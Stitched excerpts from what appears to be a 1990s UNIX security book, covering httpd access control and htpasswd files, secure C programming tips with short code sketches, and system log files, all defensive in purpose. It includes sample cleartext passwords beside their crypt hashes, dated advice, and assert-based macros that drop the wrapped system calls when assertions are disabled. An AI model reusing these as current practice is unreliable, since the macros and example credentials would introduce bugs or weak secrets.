AuthRealm realm

Sets the name of the Authorization Realm for the directory. The name of the realm is displayed by the Web browser when it asks for a username and password.

AuthType type

Specifies the type of authentication used by the server. When this book was written, NCSA's httpd only supported the Basic authentication system (usernames and passwords).

AuthUserFile absolute_pathname

Specifies the pathname of the httpd password file. This password file is created and maintained with the NCSA htpasswd program. This password file is not stored in the same format as /etc/passwd. The format is described in the section called "Setting up Web Users and Passwords" later in this chapter.

AuthGroupFile absolute_pathname

This specifies the pathname of the httpd group file. This group file is a regular text file. It is not in the format of the UNIX /etc/group file. Instead, each line begins with a group name and a colon, and then lists the members, separating each member with a space. For example:

stooges: larry moe curley

Limit methods to limit

Begins a section that lists the limitations on the directory. In Version 1.42, this command can only be used to limit the GET and POST directives. Within the Limit section, you may have the following directives:

order ord

Specifies the order in which allow and deny statements should be checked. Specify "deny,allow" to check the deny entries first; servers that match both the "deny" and "allow" lists are allowed. Specify "allow,deny" to check the allow entries first; servers that match both are denied. Specify "mutual-failure" to cause hosts on the allow list to be allowed, those on the deny list to be denied, and all others to be denied.

allow from host1 host2

Specifies hosts that are allowed access.

deny from host1 host2

Specifies hosts that should be denied access.

require user user1 user2 user3... / require group group1 group2... / require valid-user

Specifies that access should be granted to a specific user or group. If "valid-user" is specified, then any user that appears in the user file will be allowed.

Hosts in the allow and deny statements may be any of the following:

● A domain name, such as .vineyard.net.

● A fully qualified host name, such as nc.vineyard.net.

● An IP address, such as 204.17.195.100.

● A partial IP address, such as 204.17.195, which matches any host on the subnet.

● The keyword "all," which matches all hosts.

18.3.2.1 Examples

For example, if you wish to restrict access to a directory's files to everyone on the subnet 204.17.195.*, you could add the following lines to your access.conf file:

<Directory /usr/local/etc/httpd/htdocs>
<Limit GET>
order deny,allow
deny from all
allow from 204.17.195
</Limit>
</Directory>

If you then wanted to allow only the authenticated users beth and simson to access the files, and only when they are on subnet 204.17.195, you could add these lines:

AuthType Basic
AuthName The-T-Directory
AuthUserFile /tmp/auth
<Limit GET>
order deny,allow
deny from all
allow from 204.17.195
require user simson beth
</Limit>

Of course, the first three lines could as easily go in the server's access.conf file.

If you wish to allow the users beth and simson to access the files from anywhere on the Internet, provided that they type the correct username and password, try this:

AuthType Basic
AuthName The-T-Directory
AuthUserFile /tmp/auth
<Limit GET>
require user simson beth
</Limit>

18.3.3 Setting Up Web Users and Passwords

To use authenticated users, you will need to create a password file. You can do this with the htpasswd program, using the -c option to create the file. For example:

# ./htpasswd -c /usr/local/etc/httpd/pw/auth simsong
Adding password for simsong.
New password:foo1234
Re-type new password:foo1234
#

You can add additional users and passwords with the htpasswd program. When you add additional users, do not use the -c option, or you will erase all of the users who are currently in the file:

# ./htpasswd /usr/local/etc/httpd/pw/auth beth
Adding password for beth.
New password:luvsim
Re-type new password:luvsim
#

The password file is similar, but not identical, to the standard /etc/passwd file:

# cat /usr/local/etc/httpd/pw/auth
simsong:ZdZ2f8MOeVcNY
beth:ukJTIFYWHKwtA
#

Because the Web server uses crypt()-style passwords, it is important that the password file be inaccessible to normal users on the server (and to users over the Web) to prevent an ambitious attacker from trying to guess passwords using a program such as Crack.
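To see why, here is a rough sketch of the comparison the server makes; anyone who can read the file can run the same computation offline against a dictionary. (The helper function is our own illustration, not part of httpd, and on some systems crypt() is declared in <crypt.h> and requires linking with -lcrypt.)

/* pwcheck.c - sketch of a crypt()-style password comparison. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>     /* crypt() is declared here on many systems */

/* Return 1 if the cleartext password matches the stored hash. */
int password_ok(const char *cleartext, const char *stored_hash)
{
    char *hashed = crypt(cleartext, stored_hash); /* hash doubles as salt */
    return hashed != NULL && strcmp(hashed, stored_hash) == 0;
}

int main(void)
{
    /* Hash in the same style as the file shown above. */
    const char *hash = "ZdZ2f8MOeVcNY";
    printf("match: %d\n", password_ok("foo1234", hash));
    return 0;
}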



Chapter 23
Writing Secure SUID and Network Programs

23.2 Tips on Avoiding Security-related Bugs

Software engineers define errors as mistakes made by humans when designing and coding software. Faults are manifestations of errors in programs that may result in failures. Failures are deviations from program specifications. In common usage, faults are called bugs.

Why do we bother to explain these formal terms? For three reasons:

1. To remind you that although bugs (faults) may be present in the code, they aren't necessarily a problem until they trigger a failure. Testing is designed to trigger such a failure before the program becomes operational...and results in damage.

2. Bugs don't suddenly appear in code. They are there because some person made a mistake - from ignorance, from haste, from carelessness, or for some other reason. Ultimately, unintentional flaws that allow someone to compromise your system are caused by people who made errors.

3. Almost every piece of UNIX software has been developed without comprehensive specifications. As a result, you cannot easily tell when a program has actually failed. Indeed, what appears to be a bug to users of the program might be a feature that was intentionally planned by the program's authors.[5]

[5] "It's not a bug, it's a feature!"

When you write a program that will run as superuser or in some other critical context, you must try to make the program as bug free as possible because a bug in a program that runs as superuser can leave your entire computer system wide open.

Of course, no program can be guaranteed perfect. A library routine can be faulty, or a stray gamma ray may flip a bit in memory to cause your program to misbehave. Nevertheless, there are a variety of techniques that you can employ when writing programs that will tend to minimize the security implications of any bugs that may be present. You can also program defensively to try to counter any problems that you can't anticipate now.

Here are some general rules to code by:

1. Carefully design the program before you start.

Be certain that you understand what you are trying to build. Carefully consider the environment in which it will run, the input and output behavior, files used, arguments recognized, signals caught, and other aspects of behavior. Try to list all of the errors that might occur, and how you will deal with them. Consider writing a specification document for the code. If you can't or won't do that, at least consider writing documentation including a complete manual page before you write any code. That can serve as a valuable exercise to focus your thoughts on the code and its intended behavior.

2. Check all of your arguments.

An astonishing number of security-related bugs arise because an attacker sends an unexpected argument or an argument with unanticipated format to a program or a function within a program. A simple way to avoid these kinds of problems is by having your program always check all of its arguments. Argument checking will not noticeably slow down most programs, but it will make them less susceptible to hostile users. As an added benefit, argument checking and error reporting will make the process of catching non-security-related bugs easier.

When you are checking arguments in your program, pay extra attention to the following (a short sketch of these checks appears after this list):

❍ Check arguments passed to your program on the command line. Check to make sure that each command-line argument is properly formed and bounded.

❍ Check arguments that you pass to UNIX system functions. Even though your program is calling the system function, you should check the arguments to be sure that they are what you expect them to be. For example, if you think that your program is opening a file in the current directory, you might want to use the index() function to see if the filename contains a slash character (/). If the file does contain the slash, and it shouldn't, the program should not open the file.

❍ Check arguments passed in environment variables to your program, including general environment variables and such variables as the LESS argument.

❍ Do bounds checking on every variable. If you only define an option as valid from 1 to 5, be sure that no one tries to set it to 0, 6, -1, 32767, or 32768. If string arguments are supposed to be 16 bytes or less, check the length before you copy them into a local buffer (and don't forget the room required for the terminating null byte). If you are supposed to have three arguments, be sure you got three.
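Here is a minimal sketch of this kind of checking; the option range, the 16-byte name limit, and the program name are invented for the example (strchr() is the ANSI equivalent of the older index()):

/* checkargs.c - sketch of strict command-line argument checking. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXNAME 16                      /* assumed limit for this example */

int main(int argc, char *argv[])
{
    int level;

    if (argc != 3) {                    /* expect exactly two arguments */
        fprintf(stderr, "usage: checkargs level name\n");
        exit(1);
    }
    level = atoi(argv[1]);
    if (level < 1 || level > 5) {       /* bounds check the numeric option */
        fprintf(stderr, "level must be between 1 and 5\n");
        exit(1);
    }
    if (strlen(argv[2]) >= MAXNAME) {   /* leave room for the null byte */
        fprintf(stderr, "name is too long\n");
        exit(1);
    }
    if (strchr(argv[2], '/') != NULL) { /* a simple filename, no slashes */
        fprintf(stderr, "name may not contain '/'\n");
        exit(1);
    }
    printf("arguments look reasonable\n");
    return 0;
}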

3. Don't use routines that fail to check buffer boundaries when manipulating strings of arbitrary length.

In the C programming language particularly, note the following:

Avoid     Use Instead
gets()    fgets()
strcpy()  strncpy()
strcat()  strncat()

Use the following library calls with great care - they can overflow either a destination buffer or an internal, static buffer on some systems if the input is "cooked" to do so:[6] sprintf(), fscanf(), scanf(), sscanf(), vsprintf(), realpath(), getopt(), getpass(), streadd(), strecpy(), and strtrns(). Check to make sure that you have the version of the syslog() library which checks the length of its arguments.

[6] Not all of these will be available under every version of UNIX.

There may be other routines in libraries on your system of which you should be somewhat cautious. Note carefully if a copy or transformation is performed into a string argument without benefit of a length parameter to delimit it. Also note if the documentation for a function says that the routine returns a pointer to a result in static storage. If an attacker can provide the necessary input to overflow these buffers, you may have a major problem.
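As a small sketch of the difference, here is a bounded copy and concatenation of untrusted input; the buffer size is arbitrary for the example:

/* boundedcopy.c - sketch: copy untrusted input with explicit bounds. */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[64];

    if (argc < 2)
        return 1;

    /* Unsafe: strcpy(buf, argv[1]) writes past buf if argv[1] is long.
     * Bounded: copy at most sizeof(buf)-1 bytes, then terminate,
     * because strncpy() does not always add the null byte itself. */
    strncpy(buf, argv[1], sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';

    /* Bounded concatenation: never append more than the space left. */
    strncat(buf, ".txt", sizeof(buf) - strlen(buf) - 1);

    printf("result: %s\n", buf);
    return 0;
}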

4. Check all return codes from system calls.

The UNIX operating system has almost every single system call provide a return code. Even system calls that you think cannot fail, such as write(), chdir(), or chown(), can fail under exceptional circumstances and return appropriate return codes.

When Good Calls Fail

You may not believe that system calls can fail for a program that is running as root. For instance, you might not believe that a chdir() call could fail, as root has permission to change into any directory. However, if the directory in question is mounted via NFS, root has no special privileges. The directory might not exist, again causing the chdir() call to fail. If the target program is started in the wrong directory and you fail to check the return codes, the results will not be what you expected when you wrote the code.

Or consider the open() call. It can fail for root, too. For example, you can't open a file on a CD-ROM for writing, because CD-ROM is a read-only medium. Or consider someone creating several thousand zero-length files to use up all the inodes on the disk. Even root can't create a file if all the free inodes are gone.

The fork() system call may fail if the process table is full, exec() may fail if the swap space is exhausted, and sbrk() (the call which allocates memory for malloc()) may fail if a process has already allocated the maximum amount of memory allowed by process limits. An attacker can easily arrange for these cases to occur. The difference between a safe and an unsafe program may be how that program deals with these situations.

If you don't like to type explicit checks for each call, then consider writing a set of macros to "wrap" the calls and do it for you. You will need one macro for calls that return -1 on failure, and another for calls that return 0 on failure.

Here are some macros that you may find helpful:

#include <assert.h>
#define Call0(s) assert((s) != 0)
#define Call1(s) assert((s) >= 0)

Here is how to use them:

Call1(fd = open("foo", O_RDWR, 0666));

Note, however, that these simply cause the program to terminate without any cleanup. You may prefer to change the macros to call some common routine first to do cleanup and logging.

When the calls fail, check the errno variable to determine why they failed. Have your program log the unexpected value and then cleanly terminate if the system call fails for any unexpected reason. This approach will be a great help in tracking down problems later on.

If you think that a system call should not fail and it does, do something appropriate. If you can't think of anything appropriate to do, then have your program delete all of its temporary files and exit.

5. Don't design your program to depend on UNIX environment variables.

The simplest way to write a secure program is to make absolutely no assumptions about your environment and to set everything explicitly (e.g., signals, umask, current directory, environment variables). A common way of attacking programs is to make changes in the runtime environment that the programmer did not anticipate.

Thus, you want to make certain that your program environment is in a known state. Here are some of the things you want to do (a sketch of the environment-scrubbing approach follows this list):

❍ If you absolutely must pass information to the program in its environment, then have your program test for the necessary environment variables and then erase the environment completely.

❍ Otherwise, wipe the environment clean of all but the most essential variables. On most systems, this is the TZ variable that specifies the local time zone, and possibly some variables to indicate locale. Cleaning the environment avoids any possible interactions between it and the UNIX system libraries.

❍ You might also consider constructing a new envp and passing that to exec(), rather than using even a scrubbed original envp. Doing so is safer because you explicitly create the environment rather than trying to clean it.

❍ Make sure that the file descriptors that you expect to be open are open, and that the file descriptors you expect to be closed are closed.

❍ Ensure that your signals are set to a sensible state.

❍ Set your umask appropriately.

❍ Explicitly chdir() to an appropriate directory when the program starts.

❍ Set whatever limit values are necessary so that your program will not leave a core file if it fails. Consider setting your other limits on number of files and stack size to appropriate values if they might not be appropriate at program start.
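Here is a minimal sketch of the "construct a new envp" approach; the program being run, the PATH, and the TZ value are placeholders chosen for the example:

/* cleanexec.c - sketch: run a child with an explicitly built environment. */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* Only the variables we deliberately choose to pass along. */
    char *cleanenv[] = {
        "PATH=/bin:/usr/bin",
        "TZ=US/Eastern",               /* placeholder time zone */
        (char *)0
    };
    char *argvec[] = { "ls", "-l", (char *)0 };

    execve("/bin/ls", argvec, cleanenv);   /* the child sees only cleanenv */
    perror("execve");                      /* reached only if the exec fails */
    return 1;
}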

6. Have internal consistency-checking code.

Use the assert macro if you are programming in C. If you have a variable that you know should either be a 1 or a 2, then your program should not be running if the variable is anything else.

7. Include lots of logging.

You are almost always better having too much logging rather than too little. Report your log information into a dedicated log file. Or, consider using the syslog facility, so that logs can be redirected to users or files, piped to programs, and/or sent to other machines. And remember to do bounds checking on arguments passed to syslog() to avoid buffer overflows (a small sketch follows the list below).

Here is specific information that you might wish to log:

❍ The time that the program was run.

❍ The UID and effective UID of the process.

❍ The GID and effective GID of the process.

❍ The terminal from which it was run.

❍ The process number (PID).

❍ Command-line arguments.

❍ Invalid arguments, or failures in consistency checking.

❍ The host from which the request came (in the case of network servers).
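A minimal sketch of bounded logging through syslog; the daemon name and message text are arbitrary for the example:

/* logdemo.c - sketch: bounded logging through the syslog facility. */
#include <stdio.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>

void log_request(const char *untrusted)
{
    char msg[256];

    /* Copy at most sizeof(msg)-1 bytes of the untrusted string. */
    strncpy(msg, untrusted, sizeof(msg) - 1);
    msg[sizeof(msg) - 1] = '\0';

    openlog("mydaemon", LOG_PID, LOG_DAEMON);
    /* Always supply a fixed format string; never pass user input
     * as the format itself. */
    syslog(LOG_INFO, "uid %d request: %s", (int)getuid(), msg);
    closelog();
}

int main(void)
{
    log_request("example request text");
    return 0;
}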

8. Make the critical portion of your program as small and as simple as possible.

9. Read through your code.

Think of how you might attack it yourself. What happens if the program gets unexpected input? What happens if you are able to delay the program between two system calls?

10. Always use full pathnames for any filename argument, for both commands and data files.

11. Check anything supplied by the user for shell meta characters if the user-supplied input is passed on to another program, written into a file, or used as a filename. In general, checking for good characters is safer than checking for a set of "bad characters" and is not that restrictive in most situations; a small sketch of this approach follows.
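The allowed character set below is an assumption made for the example; adjust it to what your program actually needs:

/* goodchars.c - sketch: accept only an explicit list of characters. */
#include <stdio.h>
#include <string.h>

/* Return 1 if name contains only characters we consider safe. */
int name_is_clean(const char *name)
{
    const char *ok = "abcdefghijklmnopqrstuvwxyz"
                     "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                     "0123456789._-";
    return name[0] != '\0' && strspn(name, ok) == strlen(name);
}

int main(int argc, char *argv[])
{
    if (argc != 2 || !name_is_clean(argv[1])) {
        fprintf(stderr, "bad filename\n");
        return 1;
    }
    printf("%s looks safe\n", argv[1]);
    return 0;
}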

12. Examine your code and test it carefully for assumptions about the operating environments. For example:

❍ If you assume that the program is always run by somebody who is not root, what happens if the program is run by root? (Many programs designed to be run as daemon or bin can cause security problems when run as root, for instance.)

❍ If you assume that it will be run by root, what happens if it is not run as root?

❍ If you assume that a program always runs in the /tmp or /tmp/root [7] directory, what happens if it is run somewhere else?

[7] We use /tmp/root, with the understanding that you have a directory /tmp/root automatically created by your start-up scripts, and that this directory has a mode of 0700. Your /tmp directory should have mode 1777, which prevents ordinary users from deleting the /tmp/root directory.



13. Make good use of available tools.

If you are using C and have an ANSI C compiler available, use it, and use prototypes for calls. If you don't have an ANSI C compiler, then be sure to use the -Wall option to your C compiler (if supported) or the lint program to check for common mistakes.

14. Test your program thoroughly.

If you have a system based on SVR4, consider using (at the least) tcov, a statement-coverage tester. Consider using commercial products, such as CodeCenter and Purify (from personal experience, we can tell you that these programs are very useful). Look into GCT, a test tool developed by Brian Marick at the University of Illinois.[8] Remember that finding a bug in testing is better than letting some anonymous system cracker find it for you!

[8] Available for FTP from ftp.cs.uiuc.edu.

15. Be aware of race conditions. These can manifest themselves as a deadlock, or as the failure of two calls to execute in close sequence.

❍ Deadlock conditions. Remember: more than one copy of your program may be running at the same time. Consider using file locking for any files that you modify. Provide a way to recover the locks in the event that the program crashes while a lock is held. Avoid deadlocks or "deadly embraces," which can occur when one program attempts to lock file A and then file B, while another program already holds a lock for file B and then attempts to lock file A.

❍ Sequence conditions. Be aware that your program does not execute atomically. That is, the program can be interrupted between any two operations to let another program run for a while - including one that is trying to abuse yours. Thus, check your code carefully for any pair of operations that might fail if arbitrary code is executed between them.

In particular, when you are performing a series of operations on a file, such as changing its owner, stat'ing the file, or changing its mode, first open the file and then use the fchown(), fstat(), or fchmod() system calls. Doing so will prevent the file from being replaced while your program is running (a possible race condition). Also avoid the use of the access() function to determine your ability to access a file: using the access() function followed by an open() is a race condition, and almost always a bug.
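The sketch below shows the pattern; the specific permission change (clearing group and world write bits) is purely an illustration. The file is opened once, and every later check or change goes through the open descriptor rather than the pathname, so the object being examined cannot be swapped out from under the program. There is also no call to access(); if the open() succeeds, the program has the access it needs.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Open a file, then examine and modify it through its descriptor only. */
int tighten_file(const char *path)
{
    struct stat st;
    int fd;

    fd = open(path, O_RDWR);                 /* open first                     */
    if (fd < 0) {
        perror(path);
        return -1;
    }
    if (fstat(fd, &st) < 0 ||                /* then operate on the descriptor */
        fchmod(fd, st.st_mode & ~(S_IWGRP | S_IWOTH)) < 0) {
        perror(path);
        close(fd);
        return -1;
    }
    /* ... read or write through fd as needed ... */
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    return (argc == 2 && tighten_file(argv[1]) == 0) ? 0 : 1;
}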

16. Don't have your program dump core except during your testing.

Core files can fill up a filesystem. Core files can contain confidential information. In some cases, an attacker can actually use the fact that a program dumps core to break into a system. Instead of dumping core, have your program log the appropriate problem and exit. Use the setrlimit() function to limit the size of the core file to 0.
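A minimal sketch of doing this early in main():

#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    rl.rlim_cur = 0;                    /* no core file, even on a crash */
    rl.rlim_max = 0;
    (void) setrlimit(RLIMIT_CORE, &rl);

    /* ... rest of the program ... */
    return 0;
}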

17. Do not provide shell escapes (with job control, they are no longer needed).

18. Never use system() or popen() calls.

Both invoke the shell, and can have unexpected results when they are passed arguments with funny characters, or in cases in which environment variables have peculiar definitions.
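If you must run another program, a safer pattern is to fork and exec it with an explicit argument vector, so that no shell ever interprets the arguments. The sketch below is only an illustration; /bin/ls stands in for whatever program you actually need to run.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run "/bin/ls -l dir" without invoking a shell. */
int list_directory(const char *dir)
{
    pid_t pid;
    int status;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[4];
        argv[0] = "ls";
        argv[1] = "-l";
        argv[2] = (char *) dir;     /* passed as data, never parsed by a shell */
        argv[3] = NULL;
        execv("/bin/ls", argv);
        _exit(127);                 /* only reached if the exec fails */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return status;
}

int main(void)
{
    return list_directory("/tmp") == 0 ? 0 : 1;
}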



19. If you are expecting to create a new file with the open call, then use the O_EXCL | O_CREAT flags to cause the routine to fail if the file exists. If you expect the file to be there, be sure to omit the O_CREAT flag so that the routine will fail if the file is not there.[9]

[9] Note that on some systems, if the pathname in the open call refers to a symbolic link that names a file that does not exist, the call may not behave as you expect. This scenario should be tested on your system so you know what to expect.
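For instance, creating a brand-new output file might look like the following sketch; the filename is only an example. If something already exists under that name - say, a file or symbolic link planted by an attacker - the open() fails instead of silently using it.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    /* Fail unless we really create a new file. */
    int fd = open("/tmp/root/example.out", O_WRONLY | O_CREAT | O_EXCL, 0600);

    if (fd < 0) {
        perror("/tmp/root/example.out");
        return 1;
    }
    write(fd, "hello\n", 6);
    close(fd);
    return 0;
}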

20. If you think that a file should be a file, use lstat() to make sure that it is not a link. However, remember that what you check may change before you can get around to opening it if it is in a public directory. (See the earlier item on race conditions.)
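One way to combine this check with the race-condition advice above is sketched below (the function name is illustrative): lstat() the name, open() it, fstat() the resulting descriptor, and then confirm that both calls saw the same plain file before trusting it.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Return an open descriptor only if path is a plain file and was not
 * replaced between the lstat() and the open(); otherwise return -1. */
int open_plain_file(const char *path)
{
    struct stat before, after;
    int fd;

    if (lstat(path, &before) < 0 || !S_ISREG(before.st_mode))
        return -1;                       /* missing, or a link/device/directory */
    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &after) < 0 ||
        before.st_dev != after.st_dev || before.st_ino != after.st_ino) {
        close(fd);                       /* the object changed underneath us */
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    int fd = (argc == 2) ? open_plain_file(argv[1]) : -1;

    if (fd < 0)
        return 1;
    close(fd);
    return 0;
}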

21. If you need to create a temporary file, consider using the tmpfile() function.

tmpfile() creates a temporary file, opens the file, deletes the file, and returns a file handle. The open file can be passed to a subprocess created with fork() and exec(), but the contents of the file cannot be read by any other program on the system. The space associated with the file will automatically be returned to the operating system when your program exits. If possible, create the temporary file in a closed directory, such as /tmp/root/.

NOTE: The mktemp() library call is not safe to use in a program that is running with extra privilege. The code as provided on most versions of UNIX has a race condition between a file test and a file open. This condition is a well-known problem, and relatively easy to exploit. Avoid the standard mktemp() call.
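A minimal use of tmpfile() might look like the following sketch: the scratch file has no name that another program could open, and its storage is reclaimed automatically when the program exits.

#include <stdio.h>

int main(void)
{
    char line[256];
    FILE *tmp = tmpfile();      /* created, opened, and already unlinked */

    if (tmp == NULL) {
        perror("tmpfile");
        return 1;
    }
    fprintf(tmp, "scratch data\n");
    rewind(tmp);
    if (fgets(line, sizeof(line), tmp) != NULL)
        fputs(line, stdout);
    return 0;
}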

22. Do not create files in world-writable directories.

23. Have your code reviewed by another competent programmer (or two, or more).

After they have reviewed it, "walk through" the code with them and explain what each part does. We have found that such reviews are a surefire way to discover logic errors. Trying to explain why something is done a certain way often results in an exclamation of "Wait a moment ... why did I do that?"

24. If you need to use a shell as part of your program, don't use the C shell.

Many versions have known flaws that can be exploited, and nearly every version performs an implicit eval $TERM on start-up, enabling all sorts of attacks. Furthermore, the C shell makes it difficult to do things that you may want to do, such as capture error output to another file or pipe. We recommend the use of ksh93 (used for most of the shell scripts in this book). It is well designed, fast, powerful, and well documented (see Appendix D).

Remember, many security bugs are actually programming bugs, which is good news for programmers.<br />

When you make your program more secure, you'll simultaneously be making it more reliable.<br />




Chapter 10<br />

Auditing and Logging<br />

10.3 Program-Specific Log Files<br />

Depending on the version of <strong>UNIX</strong> you are using, you may find a number of other log files in your log file directory.<br />

10.3.1 aculog File<br />

The tip command and the Berkeley version of the UUCP commands record information in the aculog file each time<br />

they make a telephone call. The information recorded includes the account name, date, time, entry in the /etc/remote<br />

file that was used to place the call, phone number dialed, actual device used, and whether the call was successful or<br />

not.<br />

Here is a sample log:<br />

tomh (Mon Feb 13 08:43:03 1995) call aborted<br />

tomh (Tue Mar 14 16:05:00 1995) call completed<br />

carol (Tue Mar 14 18:08:33 1995) call completed<br />

In the first two cases, the user tomh connected directly to the modem. In these cases, the phone number dialed was not<br />

recorded.<br />

Most Hayes-compatible modems can be put into command mode by sending them a special "escape sequence."<br />

Although you can disable this feature, many sites do not. In those cases, there is no way to be sure if the phone<br />

numbers listed in the aculog are in fact the phone numbers that were called by your particular user. You also do not<br />

have any detailed information about how long each call was.<br />

10.3.2 sulog Log File<br />

Some versions of UNIX record attempts to use the su command by printing to the console (and therefore to the messages log file). In addition, some recent versions specially log su attempts to the log file sulog.

Under some versions of System V-related UNIX, you can control logging via settings in the /etc/default/su file. Depending on the version involved, you may be able to set the following:

# A file to log all su attempts<br />

SULOG=/var/adm/sulog<br />

# A device to log all su attempts<br />

CONSOLE=/dev/console<br />

# Whether to also log using the syslog facility<br />

SYSLOG=yes<br />

Here is a sample sulog from a computer running Ultrix V4.2A:<br />

BADSU: han /dev/ttyqc Wed Mar 8 16:36:29 1995<br />

BADSU: han /dev/ttyqc Wed Mar 8 16:36:40 1995<br />

BADSU: rhb /dev/ttyvd Mon Mar 13 11:48:58 1995<br />


SU: rhb /dev/ttyvd Mon Mar 13 11:49:39 1995<br />

As you can see, the user han apparently didn't know the superuser password, whereas the user rhb apparently<br />

mistyped the password the first time and typed it correctly on the second attempt.<br />

Scanning the sulog is a good way to figure out if your users are trying to become the superuser by guessing passwords. If you see dozens of su attempts from a particular user who is not supposed to have access to the superuser account, you might want to ask him what is going on. Unfortunately, if a user actually does achieve the powers of the superuser account, he can use those powers to erase his BADSU attempts from the log file. For this reason, you might want to have BADSU attempts logged to a hardcopy printer or to a remote, secure computer on the Internet. See Section 10.5.2.1, "Logging to a printer" and Section 10.5.2.2, "Logging across the network" later in this chapter.

10.3.3 xferlog Log File<br />

If your computer uses the Washington University FTP server, then you can configure your server to log all files<br />

transferred. The default filename for this log is xferlog, and the default location is the directory /var/adm/. The<br />

location is defined by the configuration variable _PATH_XFERLOG in the file pathnames.h.<br />

The following information is recorded in the file xferlog for each file transferred:<br />

● Date and time of transfer
● Name of the remote host that initiated the transfer
● Size of the file that was transferred
● Name of the file that was transferred
● Mode of the file that was transferred (a for ASCII; b for binary)
● Special action flag (C for compressed; U for uncompressed; T for tar archive)
● Direction of the transfer (o for outgoing, i for incoming)
● The kind of user who was logged in (a for anonymous user; g for guest; and r for a local user who was authenticated with a password)

Here is a sample from the xferlog on a server:<br />

Sat Mar 11 20:40:14 1995 329 CU-DIALUP-0525.CIT.CORNELL.EDU 426098<br />

/pub/simson/scans/91.Globe.Arch.ps.gz b _ o a ckline@tc.cornell.edu ftp 0*<br />

Mon Mar 13 01:32:29 1995 9 slip-2-36.ots.utexas.edu 14355<br />

/pub/simson/clips/95.Globe.IW.txt a _ o a mediaman@mail.utexas.edu ftp 0 *<br />

Mon Mar 13 23:30:42 1995 1 mac 52387 /u/beth/.newsrc a _ o r bethftp 0 *<br />

Tue Mar 14 00:04:10 1995 1 mac 52488 /u/beth/.newsrc a _ i r bethftp 0 *<br />

The last two entries were generated by a user who was running the Newswatcher netnews program on a Macintosh<br />

computer. At 23:30, Newswatcher retrieved the user's .newsrc file; at 00:04 the next morning, the .newsrc file was<br />

sent back.<br />

10.3.4 uucp Log Files<br />

Derivatives of the BNU version of UUCP (the version you are most likely to encounter on non-Linux systems) may<br />

have comprehensive logging available. These log files are normally contained in the /var/spool/uucp/.Admin directory.<br />

These include logs of transfers, foreign contacts, and user activity. Of most interest is the file security, if it exists. This file records attempts to violate the restrictions placed on the UUCP system.


One type of record present may indicate attempts to make prohibited transfers of files. These records start with the tag<br />

xfer and contain the name and user on the requesting and destination hosts involved in the command, information to<br />

identify the file name and size, and information about the time and date of transfer.<br />

The other type of record starts with the tag "rexe" and indicates attempts to execute a command that is not allowed.<br />

This record will contain the name and user on the requesting and destination hosts involved in the command, the date<br />

and time of the attempt, and the command and options involved.<br />

The exact format of the fields may differ slightly from system to system, so check your documentation for exact<br />

details.<br />

We suggest that you monitor this file for changes so you will be aware of any problems that are recorded. Because the<br />

directory is not one you might otherwise monitor, you may wish to write a shell script (similar to the one shown<br />

below) to put in the crontab to run every few hours:<br />

#!/bin/ksh
# set the following to indicate the user to notify of a new
# security record
typeset User=root

cd /var/spool/uucp/.Admin
if [[ -r security.mark ]]
then
    if [[ security -nt security.mark ]]
    then
        comm -3 security security.mark | tee -a security.mark |
            /bin/mailx -s "New uucp security record" $User
    fi
else
    touch security.mark
fi

10.3.5 access_log Log File<br />

If you are running the NCSA HTTPD server for the World Wide Web, then you can determine which sites have been<br />

contacting your system and which files have been downloaded by examining the log file access_log.[6]<br />

[6] Other WWW servers also log this information, but we will only present this one as an example. See<br />

your documentation for details about your own server.<br />

The HTTPD server allows you to specify where the access_log file is kept; by default, it is kept in the directory<br />

/usr/local/etc/http/logs.<br />

Each line in the log file consists of the following information:<br />

● Name of the remote computer that initiated the transfer
● Remote login name, if it was supplied, or "-" if not supplied
● Remote username, if supplied, or "-" if not supplied
● Time that the transfer was initiated (day of month, month, year, hour, minute, second, and time zone offset)
● HTTP command that was executed (usually GET)
● Status code that was returned
● Number of bytes that were transferred

Here are some sample log entries:

port15.ts1.msstate.edu - - [09/Apr/1995:11:55:37 -0400] "GET /simson HTTP/1.0" 302 -
ayrton.eideti.com - - [09/Apr/1995:11:55:37 -0400] "GET /unix-haters-title.gif HTTP/1.0" 200 49152
port15.ts1.msstate.edu - - [09/Apr/1995:11:55:38 -0400] "GET /simson/ HTTP/1.0" 200 1248
mac-22.cs.utexas.edu - - [09/Apr/1995:14:32:50 -0400] "GET /unix-haters.html HTTP/1.0" 200 2871
204.32.162.175 - - [09/Apr/1995:14:33:21 -0400] "GET /wedding/slides/020.jpeg HTTP/1.0" 200 9198
mac-22.cs.utexas.edu - - [09/Apr/1995:14:33:53 -0400] "GET /unix-haters-title.gif HTTP/1.0" 200 58092

One program for analyzing the access_log log file is getstats, available via anonymous FTP from a number of servers.<br />

This program can tell you how many people have accessed your server, where they are coming from, what files are the<br />

most popular, and a variety of other interesting statistics. We have had good results with getstats. For further<br />

information on getstats, check:<br />

http://www.eit.com/software/getstats/getstats.html<br />

10.3.6 Logging Network Services<br />

Some versions of the inetd <strong>Internet</strong> services daemon have a "-t" (trace) option that can be used for logging incoming<br />

network services. To enable inetd logging, locate the startup file from which inetd is launched and add the -t option.<br />

For example, under Solaris 2.4, inetd is launched in the file /etc/rc2.d/S72inetsvc by the following line:<br />

#<br />

# Run inetd in "standalone" mode (-s flag) so that it doesn't have<br />

# to submit to the will of SAF. Why did we ever let them change inetd?<br />

#<br />

/usr/sbin/inetd -s<br />

To enable logging of incoming TCP connections, the last line should be changed to read:<br />

/usr/sbin/inetd -t -s<br />

Logs will appear in /var/adm/messages. For example:<br />

Jan 3 10:58:57 vineyard.net inetd[4411]: telnet[4413] from 18.85.0.2<br />

